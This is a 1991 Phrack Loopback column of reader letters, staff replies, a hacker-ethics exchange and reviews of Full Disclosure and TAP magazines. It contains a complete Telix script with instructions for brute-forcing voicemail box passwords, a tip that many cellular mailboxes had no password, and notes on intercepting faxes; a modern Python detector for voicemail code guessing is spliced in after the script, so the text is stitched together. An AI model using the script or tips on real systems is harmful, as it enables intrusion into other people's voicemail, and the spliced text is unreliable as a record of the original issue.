Title : Phrack Loopback
Author : Phrack Staff
==Phrack Inc.==
Volume Three, Issue Thirty-five, File 2 of 13
[-=:< Phrack Loopback >:=-]
By Phrack Staff
Phrack Loopback is a forum for you, the reader, to ask questions, air
problems, and talk about whatever topic you would like to discuss. This is
also the place The Phrack Staff will make suggestions to you by reviewing
various items of note: magazines, software, catalogs, hardware, etc.
______________________________________________________________________________
What's on Your Mind
~~~~~~~~~~~~~~~~~~
:: Hacking VMB's ::
From: Mr. Upsetter
To: [email protected]
Subject: Phrack 34 VMB article
The article in Phrack 34 on voice mail hacking by Night Ranger was really good.
It reminded me of some experiences I had with a cellular voice mail system a
couple years ago in San Diego. I would bet there are similar systems in other
cities.
These VMB's would automatically answer calls when the subscriber wasn't on the
air. They worked just like standard VMB's. To access the box, the owner could
dial his or her own cellular number, then hit * when it answered. Then the VMB
would ask for a password.
Guess what the default password was? None! That meant all you had to do was
dial up a cellular VMB and hit *, and you were in. How many VMB's still had
the default password? About half...
To scan for cellular VMB's all you had to do was dial numbers in the cellular
prefix. It was pretty fun...almost too easy.
Cheers,
Mr. Upsetter
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
>From: Zoso Puda
>
>After reading PHRACK 34 I thought it was good. Especially the article on VMB
>hacking. As a matter of fact I wrote a SALT script to help me do it.
This is exactly what we like to see. People actually getting basic
information and building on it.
- - - - - - - - - - - - - - - - - - - - - - - - - - -
+-------------------------------------+
| ZoSoft Telix VMB Hacker |
| |
| written by: Zoso Puda |
+-------------------------------------+
First words
-----------
After reading Night Ranger's article (see PHRACK 34), I decided to make a
VMB hacking program. Night Ranger provided good insight into how to hack VMB
systems but some VMBs are hard to crack. What I came up with is a program to
help me hack some of the harder systems. The ones that don't use the defaults
are tough. Also my phone has the buttons and earpiece in one unit and I had to
dial then put the phone to my ear and listen, look at the buttons to dial a
number and put the phone back to my ear to listen. It soon became tiresome.
What I finally came up with was a program to let me run all the phone
functions from the keyboard. My modem speaker is loud enough to hear clearly so
it seemed like the perfect thing to do. I also automated certain features like
incrementing the password or box number. The program is not fully automated
however. You must run this program manually. Its main purpose is to allow you
to run normal phone functions via the keyboard. If you cannot hear clearly
through your modem speaker then pick up the phone after the program dials the
VMB phone # and hang up the phone before hanging up the modem.
What follows is a brief description on how to use the program, compile the
program, and run the program. A working knowledge of VMB systems is expected.
Parameter details
-----------------
VMB phone number : If you don't know this, give it up.
Setup sequence   : This code is used for systems that require a '9' or '#' or
                   '*' to be pressed before the box number. Up to 3 characters
                   can be in this string.
Valid Box #      : This would be a known valid box or the box you will
                   be attempting to hack. This value remains constant.
Codefile filename: You may use a file to get 'default' or your favorite
                   passwords from. You must include the extension.
Starting box/code: Box # or code to start checking. This value will
                   increase automatically upon pressing [F7].
Using the function keys
-----------------------
[F1] Dials the VMB system (see params).
[F2] Hangs-up the modem.
[F3] Closes the current codefile (see params).
[F4] Lets you set the current code/box #.
[F5] Dials the Setup sequence (see params).
[F6] Dials the current code.
[F7] Makes the next code current.
[F8] Dials the valid box (see params).
[F9] Allows you to re-set the parameters.
[F10] Hangs-up and quits the program.
[0 - 9] These keys will dial 0 - 9 respectively.
[*, #] These keys will dial * and #.
[/] Used as a substitute # for the keypad.
Basic Instructions
-----------------
Codefiles should be stored in the same directory as your Telix program.
A sample codefile should look like this:
1111
2222
3333
etc...
I suggest you make separate codefiles for the number of digits in each code.
For example, all 3 digit codes should be in a file called 3DIGIT.COD, or
something similar.
During parameter entry, if you enter a codefile and it exists, you will NOT
be prompted for a 'Starting box/code'. When the codefile is finished, the
current code will set itself to 1000.
If you enter a blank for the codefile or the name you entered doesn't exist
then you will be prompted for a 'Starting Box/Code'.
Compiling
---------
Save the program within the 'CUT HERE' lines as VMBHACK.SLT. Copy the file
VMBHACK.SLT into the directory where your Telix scripts are. Compile using
CS.EXE. (example: CS VMBHACK.SLT) To run the program, load Telix and press
Alt-G followed by the program name (VMBHACK).
//---------------------------<CUT HERE>-------------------------------------
// ZoSoft VMB Hacker Version 1.4
// Code by: Zoso, November 1991
//
// See PHRACK 34 for more information on VMB systems.
//
// NOTE: Do not remove the credits of the original author, modified versions
// you may add credits, but please do not remove any.
//
str code[10], // Global Variables
codes[10],
reset[1],
vmb_number[15],
borc[1],
valid[10],
setup[3];
str filename[12],
fstatus[10];
int f;
int fflag = 0;
init_modem() // Modem initialization
{
cputs("AT X3 S6=0 S7=0 S11=105 M1 L3"); // X must be 3, L is Loudness on
cputs("^M"); // some modems, you may have to
waitfor("OK",20); // alter this. See your modem manual.
}
vmb_dial(str string) // Dial function
{
str workstr[20];
workstr = string;
strcat(workstr,";");
cputs("ATDT");
cputs(workstr);
cputs("^M");
cputs("^M");
}
hang_up() // Hang Up function
{
hangup();
waitfor("",20);
cputs("ATH0");
cputs("^M");
cputs("^M");
clear_scr();
display();
}
next_code() // Next code function
{
int cd;
if (fflag)
{
if (not feof(f)) // Check for file first
{
fgets(code,10,f);
return;
}
if (feof(f))
{
file_close();
code = "999";
goto NEXTCODE;
}
}
NEXTCODE:
cd = stoi(code);
cd = cd + 1; // This line determines how the code
itos(cd,code); // gets incremented.
}
set_code() // Enter new code
{
gotoxy(65,2);
gets(code,10);
}
parameters() // Set parameters
{
str c[1];
file_close();
GETINFO:
clear_scr();
printsc("VMB Hacker Parameters^M^J");
printsc("^M^JVMB phone number :");
gets(vmb_number,15);
printsc("^M^JSetup sequence :");
gets(setup,3);
printsc("^M^JValid box # :");
gets(valid,10);
printsc("^M^JCodefile filename :");
gets(filename,12);
if (filename != "")
{
open_file();
next_code();
}
if (not fflag)
{
filename = "N/A";
printsc("^M^JStarting box/code :");
gets(code,10);
}
printsc("^M^J^M^JCorrect? (Y/n):");
gets(c,1);
if (c == "n" || c == "N")
goto GETINFO;
}
press_enter() // Pause routine
{
str a[1];
pstraxy("Press [ENTER] to continue...",20,23,11);
gets(a,1);
}
title_scr() // Title screen
{
str i[1];
TITLE:
clear_scr();
pstraxy(" - ZoSoft VMB Hacker V1.4 -",20,4,11);
pstraxy("written for Telix by: Zoso Puda",20,6,14);
press_enter();
}
display() // Display screen
{
box(0,0,78,3,4,0,19); box(0,0,78,5,4,0,19);
pstraxy("[ ZoSoft VMB Hacker V1.4 ]",25,0,31);
pstraxy("VMB Number:",4,2,31); // Information display
pstraxy(vmb_number,16,2,27);
pstraxy("Valid #:",33,2,31);
pstraxy(valid,42,2,27);
pstraxy("Current:",57,2,31);
pstraxy(code,66,2,27);
pstraxy("Codefile:",6,4,31);
pstraxy(filename,16,4,27);
pstraxy("File status:",29,4,31);
pstraxy(fstatus,42,4,27);
pstraxy("Setup sequence:",50,4,31);
pstraxy(setup,66,4,27);
box(0,6,78,10,4,0,103); // Function key display
pstraxy("[ ]",30,6,111);
pstraxy(" 0 - 9,*,#",31,6,110);
pstraxy("[ ] Dial VMB", 2,7,111);
pstraxy("F1", 3,7,110);
pstraxy("[ ] Hang up",22,7,111);
pstraxy("F2",23,7,110);
pstraxy("[ ] Close file",42,7,111);
pstraxy("F3",43,7,110);
pstraxy("[ ] Set Current",61,7,111);
pstraxy("F4",62,7,110);
pstraxy("[ ] Setup seq.",2,8,111);
pstraxy("F5", 3,8,110);
pstraxy("[ ] Dial current",22,8,111);
pstraxy("F6",23,8,110);
pstraxy("[ ] Next box/code",42,8,111);
pstraxy("F7",43,8,110);
pstraxy("[ ] Valid box",61,8,111);
pstraxy("F8",62,8,110);
pstraxy("[ ] Parameters",22,9,111);
pstraxy("F9",23,9,110);
pstraxy("[ ] QUIT",41,9,111);
pstraxy("F10",42,9,110);
gotoxy(0,11);
}
quit_vmb() // End program
{
file_close();
hangup();
waitfor("",20);
clear_scr();
printsc("Thanks for using ZoSoft's VMB Hacker.^M^J^M^J");
cputs_tr(_mdm_init_str); // Restore modem params
}
open_file() // Open Codefile
{
fflag = 1;
f = fopen(filename,"r");
fstatus = "OPEN";
if (ferror(f))
file_close();
}
file_close() // Close Codefile
{
fflag = 0;
fclose(f);
fstatus = "CLOSED";
}
main() // MAIN program module
{
int chr;
title_scr();
parameters();
clear_scr();
display();
init_modem();
TOP:
gotoxy(0,11);
chr = inkeyw();
if (chr == '0') vmb_dial("0"); // Dial 0-9
if (chr == '1') vmb_dial("1");
if (chr == '2') vmb_dial("2");
if (chr == '3') vmb_dial("3");
if (chr == '4') vmb_dial("4");
if (chr == '5') vmb_dial("5");
if (chr == '6') vmb_dial("6");
if (chr == '7') vmb_dial("7");
if (chr == '8') vmb_dial("8");
if (chr == '9') vmb_dial("9");
if (chr == '#') vmb_dial("#"); // Pound sign (#)
if (chr == '/') vmb_dial("#"); // Make (/) same as (#) for keypad
if (chr == '*') vmb_dial("*"); // Asterisk (*)
if (chr == 15104) // F1
vmb_dial(vmb_number);
if (chr == 15360) // F2
hang_up();
if (chr == 15616) // F3
{
file_close();
display();
}
if (chr == 15872) // F4
{
set_code();
display();
}
if (chr == 16128) // F5
vmb_dial(setup);
if (chr == 16384) // F6
vmb_dial(code);
if (chr == 16640) // F7
{
next_code();
display();
}
if (chr == 16896) // F8
vmb_dial(valid);
if (chr == 17152) // F9
{
hang_up();
parameters();
display();
}
if (chr == 17408) // F10
{
quit_vmb();
goto END;
}
goto TOP;
END:
prints("^M^J");
}
//---------------------------<CUT HERE>---------------------
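From the defender's side, the two behaviours described above (stepping the current code or box number by one per attempt, and mailboxes left on a default password) both show up in a voice mail system's login log. The following is an added example, not part of the original letters or of any product's tooling; the log format, field names, sample lines and thresholds are all constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log, not taken from the page: one login attempt per line.
SAMPLE_LOG = """\
1991-11-09 02:14:07 src=5550142 box=2041 result=FAIL
1991-11-09 02:14:41 src=5550142 box=2041 result=FAIL
1991-11-09 02:15:16 src=5550142 box=2041 result=FAIL
1991-11-09 02:15:50 src=5550142 box=2041 result=FAIL
1991-11-09 02:16:22 src=5550142 box=2041 result=FAIL
1991-11-09 02:16:58 src=5550142 box=2041 result=OK
1991-11-09 03:01:10 src=5550177 box=3100 result=FAIL
1991-11-09 03:01:44 src=5550177 box=3101 result=FAIL
1991-11-09 03:02:19 src=5550177 box=3102 result=FAIL
1991-11-09 03:02:53 src=5550177 box=3103 result=OK
1991-11-09 09:30:02 src=5550199 box=2500 result=FAIL
1991-11-09 09:30:31 src=5550199 box=2500 result=OK
"""

LINE = re.compile(r"(\S+ \S+) src=(\S+) box=(\d+) result=(OK|FAIL)$")
WINDOW = timedelta(minutes=30)  # assumed look-back window
MAX_FAILS = 5                   # assumed: failed logins tolerated per mailbox
MIN_BOXES = 3                   # assumed: distinct boxes one caller may fail on

def parse(text):
    """Return (timestamp, source, box, ok) tuples in time order."""
    events = []
    for line in text.splitlines():
        m = LINE.match(line.strip())
        if m:
            ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
            events.append((ts, m.group(2), int(m.group(3)), m.group(4) == "OK"))
    return sorted(events)

def guessing_alerts(events):
    """Mailboxes with >= MAX_FAILS failures inside WINDOW (code guessing).
    A success straight after such a burst is reported as 'compromised'."""
    fails, alerts = defaultdict(list), {}
    for ts, _src, box, ok in events:
        recent = [t for t in fails[box] if ts - t <= WINDOW]
        if ok:
            if len(recent) >= MAX_FAILS:
                alerts[box] = "compromised"
            fails[box] = []
        else:
            recent.append(ts)
            fails[box] = recent
            if len(recent) >= MAX_FAILS:
                alerts.setdefault(box, "guessing")
    return alerts

def sweep_alerts(events):
    """Callers that fail on >= MIN_BOXES distinct mailboxes inside WINDOW,
    i.e. one code tried against a run of box numbers."""
    seen, alerts = defaultdict(list), {}
    for ts, src, box, ok in events:
        if ok:
            continue
        seen[src] = [(t, b) for t, b in seen[src] if ts - t <= WINDOW] + [(ts, box)]
        boxes = sorted({b for _, b in seen[src]})
        if len(boxes) >= MIN_BOXES:
            alerts[src] = boxes
    return alerts

def boxes_opened_by(events, sources):
    """Mailboxes a flagged caller did get into: likely default or weak codes."""
    return sorted({box for _, src, box, ok in events if ok and src in sources})

if __name__ == "__main__":
    ev = parse(SAMPLE_LOG)
    print("guessing:", guessing_alerts(ev))
    print("sweeps:  ", sweep_alerts(ev))
    print("reset:   ", boxes_opened_by(ev, sweep_alerts(ev)))
```

Mailboxes reported as compromised, or opened by a sweeping caller, are the ones to force a new code on.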
______________________________________________________________________________
:: More Legal Stuff ::
>From: "Michael Lawrie, Operations" <[email protected]>
>Subject: RE: Who/What is this?
>
>In this country, the receipt of documents like this would probably be
>pretty helpful in sending a person down on a conspiracy to contravene
>a section or more of the Computer Misuse Act, I do not appreciate crap
>like this appearing on my machine but since you didn't send it me, I
>can't really moan at you - What I would appreciate though is if you
>told people that forwarding it to people who don't want it is probably
>not a good idea, unless you want all your list members locked up in
>some pokey British gaol that is!
>
>Michael Lawrie.
>---
>Michael Lawrie, Hicom Group Security <[email protected]>
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sir,
You will have to excuse my ignorance of telecom laws in other countries.
In the United States, distribution of technical information such as Phrack Inc.
is protected by law.
Hackers are not involved in conspiracies or plots. Most hackers could
care less about politics. Hackers are interested in the progression of
technology and learning about how our advanced society works. The inefficient
structure known as government is the last thing most hackers are interested in
exploring.
Phrack Inc. has no "membership." Phrack Inc. is an electronically
distributed publication. It is like any other security oriented newsletter.
Have you ever heard of "Computer Security Journal", "Computers and Security",
or "Computer Crime Digest?" These are some of the "security industry"
publications that are read in the U.S. Phrack Inc. merely has a little
different flavor to it. If you are interested in seeing any of these printed
journals, I can forward their address to you.
I am sorry if you received Phrack Inc. and didn't wish to read it. You
might wish to take the matter up with the person that forwarded it to you. I
hope it wasn't too big of an inconvenience for you to delete the mail message
containing Phrack Inc.
Cheers,
Dispater
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
After a (as it turns out not so private) conversation with Torq, it seems
this guy isn't even an admin anywhere. He just likes to pretend he is. Did my
reply end this little debate? NOT! This person had the nerve to intercept my
private mail to Torq and then proceeded to bitch about it some more.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
>From [email protected] Sat Nov 9 09:45:53 1991
Date: Fri, 8 Nov 91 13:19 GMT
From: "Michael Lawrie, Operations" <[email protected]>
To: PHRACKSUB <<@nsfnet-relay.ac.uk:[email protected]>>
Subject: The EFF.
I found the following message the other day, whilst routing around, I am to
assume you lied to me about taking him off the list but for now we'll forget
that.
> From [email protected] Wed Oct 23 01:41:51 1991
> Date: Wed, 23 Oct 91 01:41:47 -0400
> From: [email protected]
> Message-Id: <::::::::::::::::::::::>
> To: torq@:::::::::::::::
> Subject: Phrack
>
> This guy sounds like a total idiot. If he does kill your account or something
> stupid, get a hold of the EFF. They went to bat for someone who had their
> account revoked because he/she had issues of Phrack on their directory.
>
> people should get a clue....
>
> Dispater
> [email protected]
As you say, people should get a clue. Are you assuming that 'torq' is perhaps
American and as such has his rights protected by constitution? He isn't, he is
British and doesn't really as such have much going for him. If I want to kill
his account I can do it at the bat of an eyelid, whilst him receiving 'Phrack'
is not breaking any laws because it does not show intent, it would be breaking
my machine's regulations if it came here. I would enjoy the EFF to come 'to
bat' for Torq if I revoke his account for having issues of Phrack in his
directory, It's a shame he hasn't. Does the EFF have any good lawyers in the UK
that you know of?
Regards...
Michael.
---
Michael Lawrie, Operations Group, Systems Development and Security.
Mail: [email protected] (Span:19527::60478::lorry)
[What pretentious signature?] (Inet: [email protected])
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
From: Dispater
To: [email protected]
I never said I would delete him from the distribution list. I don't
have to DO anything. Who the hell are you pretending to be anyway? You aren't
the admin of MIT's gnu machine.
>I found the following message the other day, whilst routing around, I am to
>assume you lied to me about taking him off the list but for now we'll forget
>that.
Really? What the hell were you doing prowling through someone else's
mail? I assume you did it without Torq's permission. I wonder if MIT would
like to hear that some British hacker is rummaging around their machine? Your
"finding" of our private e-mail might place you in criminal violation of the
Electronic Communications Privacy Act of 1986. This is a federal law in the
United States which protects the privacy of electronic communications. Your
interception of our communications has violated our privacy. How would you
like me to have a little chat with YOUR supervisor?
Why do you care about what takes place on the MIT computer which is located
here in the USA? In this country freedom of speech is a right granted to all
its citizens. The previous publisher of Phrack had to go to Federal Court to
prove it and he succeeded. Phrack Inc. is 100% legal here and there is not one
damn thing you can do about it!
Dispater
______________________________________________________________________________
:: Hacker Philosophy ::
From: The Dark Lord Sarik Malthus
Organization: Underground Computing Foundation
> I'm curious...now, don't think I am trying to judge you, or your
> actions, or anything...but I am wondering how you, in your mind, justify the
> actions of hackers and the kind of information provided by your magazine?
I don't. I think people spend too much time attempting to justify
their "morality." I don't play that guilt trip. I only seek information.
Information has no morality. It is simple and pure, just like truth.
I do feel that with knowledge comes responsibility not to use it in a
destructive way. This is why I will not print "how to make bomb" files in
Phrack Inc. Explosives are made for one thing and it doesn't involve too
much creativity. People can get that type of stuff elsewhere.
I have never damaged any system or hurt any individual financially.
Carding is unquestionable robbery. If you know the person you are carding
from, that is revenge and is a different category, as far as I am concerned,
but it still doesn't make it right. Besides, any poser with half a brain can
pull a CBI. That doesn't demonstrate much talent to me. I admit I went
through the c0deZ phase, but I moved onto better things.
I guess your basic question may boil down to, "Why hack?" I see the
internet and the telecom world as the latest frontier to be explored. If
you look back at how this country started, you will see that it was explored
by people who probably had a similar mentality to that of hackers. We want
to test ourselves. We want to have a broad range of different experiences in
our lives. We are not content with ignorance of the unknown. And, to some
extent we are sick of our current society's norms. With that in mind we
leave the security of what is considered acceptable at times.
I guess I have a lot of different unpopular views....oh well.
_______________________________________________________________________________
A Review of:
~~~~~~~~~~
Full Disclosure #23 - a publication For Truth, Justice, and The American Way
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Full Disclosure                       Subscription Rates:
P.O. Box 903-FD23                     U.S - 12 issues for $18.00
Libertyville IL 60048                       24 issues for $29.95
                                      No Canadian orders, please!
by: Twisted Pair
About a month ago I mailed in a coupon I got from a friend in order to get a
sample issue of Full Disclosure. Within a week I received Issue #23. It's got
articles on fax interception, dumpster diving, computer security tips,
surveillance tips, technical stuff, mail surveillance, etc.
The Fax Interception article was most interesting to me. I've often
wondered just how easy it could be to intercept faxes. It's all explained in
the article. Here's some text from the article:
| False Sense of Security:
|
| With the widespread proliferation of fax machines came increased use.
| In general, a document transferred has been given the same sort of
| validity as one sent or received by the U.S. Mail.* In general, such
| communications were originally secure. Now that interception equipment is
| available, the sense of security has become false.
*Note: Just this month, the FCC has stopped accepting paperwork with faxed
signatures on them. Their new policy states that they only accept
original signatures.
How could the average Phrack reader start intercepting faxes? Use a
standard fax machine hooked up to someone's line? Naaah. Wouldn't work. The
handshaking routine between the two corresponding fax machines would be screwed
all to hell if you threw a third machine into the mix. Full Disclosure claims
to have successfully nabbed faxes with another method. They've pointed out
this assertion with a photo on their front page of a "fax". It was supposedly
intercepted from the FBI. It shows a computer screen with an FBI "FAX" on it.
It looks more like the photo was made with some cutting and pasting at the
neighborhood PIP store. Maybe they should have added the caption "Simulated
Picture" to their front page.
They recommend using IBM PC fax boards to intercept faxes. You'd need
"sophisticated" software that would ignore the handshaking sequences between
the two fax machines you're spying on. The IBM would just save all the page
information and ignore the protocol information transmitted.
Back to the article....
| Cellular phone-based fax machines provide ripe opportunity for "hacker"
| intercepts, since the signal is available via low cost police scanners.*
| No physical connection to a common carrier network is necessary. There is
| absolutely no risk of being detected.
*Note: That should read MODIFIED police scanners. See any of the ads in
"Nuts & Volts" for a book on doing this.
Discussed in the article is something called Broadband Interception.
Commercial fax interception equipment can be hooked up to monitor satellite
link traffic. One unit can decode up to 150 simultaneous fax transmissions
from a 6,000 phone line satellite link.
Next, all the consequences of forged faxes are discussed. People have
become so reliant on fax technology that they incorrectly assume that anything
that "comes over the fax" must be legitimate. Forgers find faxing much simpler
than trying to make a "real" document. The trouble of altering postmarks and
signatures is bypassed. All they need now is scissors and tape to make any
"legitimate-looking" document needed. In their next issue, they further
discuss fax interception and all the implications of sending sensitive info by
fax.
| Fax Intercept Suppliers
| (The sale and/or use of fax interception equipment may be
| restricted by State and Federal law)
|
| Burlex International, Box 6094, Silver Springs MD 20906 (301) 460-4444;
| Communications Devices,3510 Mountain Rd,Haymarket VA 22069 (703) 754-9316;
| El-Tec Intl, 205 Van Buren St #220, Herndon VA 22080 (703) 709-9673;
| [Many others listed]
Oh, here's an ad from Full Disclosure. It's a business card run:
______________________________________________________
| | |
| | Unix Systems Specialists Available July 10, 1992 |
| | |
| | L E N R O S E |
| | |
| | Convicted "Hacker" |
| | and |
| | Computer Consultant |
| | 799 Royal St. Geore #105 |
| | Naperville, IL 60563 (708) 527-1293 |
| |______________________________________________________|
Since you might want to check out a copy of Full Disclosure for yourself,
I'll include their address and stuff. The issue I had was 16 pages long,
half-newspaper size.
______________________________________________________________________________
A Review of TAP #105
~~~~~~~~~~~~~~~~~~~
TAP Magazine                          Subscription Rates:
PO Box 20264                          10 issues for $10.00
Louisville KY 40250-0264
by Dispater
Around March of 1991 I mailed in my $10. for a subscription to TAP
Magazine. Promoted as "the oldest hacker magazine" and "created by Abbie
Hoffman." I still, to this day, have not received ONE issue for my money.
While attending CyberView '91, I met Predat0r and gave him $5.00 for a few
back issues consisting of #97, #100 through issue #104. I was later given a
complimentary issue of #105. After asking about #98 & #99, Predat0r said that
he wasn't going to give those out because of some bullshit with Aristotle.
Whatever...I still don't see why we couldn't see it.
Anyway, Issue #105 of TAP Magazine (June 1991) was nothing spectacular,
but it wasn't bad either. The issue was 18 pages long. For those of you who
have never seen it, TAP contains information on hacking and phreaking as well
as some political commentary. The articles are always diverse and interesting.
TAP #105 contained information about the DNA Box. This is basically
cellular phone phreaking. It was very good and quite detailed. There were
also schematics of bugs and a flow chart explaining the incident initiation
sequence of the E-911 system. This issue of TAP was sprinkled with some neat
advertisements and news clippings (as usual) and wrapped up with a file about
Blue Boxing. The price of $10.00 for 10 issues is worth it, but read on...
Last week I asked Predat0r what was going on with TAP magazine. He told
me that he had the material for the next three issues, but his copier or some
other equipment was broken. This is an excuse I have heard before. Whether it
is a valid excuse or not, only he knows. Since issue #105 (June) there has
been not one issue of TAP. If you have ordered a subscription prior to July
and not received anything, I highly suggest you write to Predat0r.
The material contained in TAP is good and very much worth the price.
(Especially compared to 2600 Magazine) However, I find the general
management of TAP to be poor, at this time, and therefore I highly recommend
that you NOT send your $10 to TAP Magazine. Considering the amount of
advertisements that we have all seen by TAP (in magazines such as Mondo 2000,
2600, etc.) in the past year, there is no excuse for the non-existent service
that has transpired. Predat0r is a good sysop and needs to manage TAP as he
does his BBS. I do urge you to call BLITZKREIG BBS (502) 499-8933 : NUP:
COLUMBIAN COKE.
I really don't like to be so critical, but I know some people I've talked
to are feeling ripped off. This is why I wrote this. I truly hope that TAP
can get out of this slump.
_______________________________________________________________________________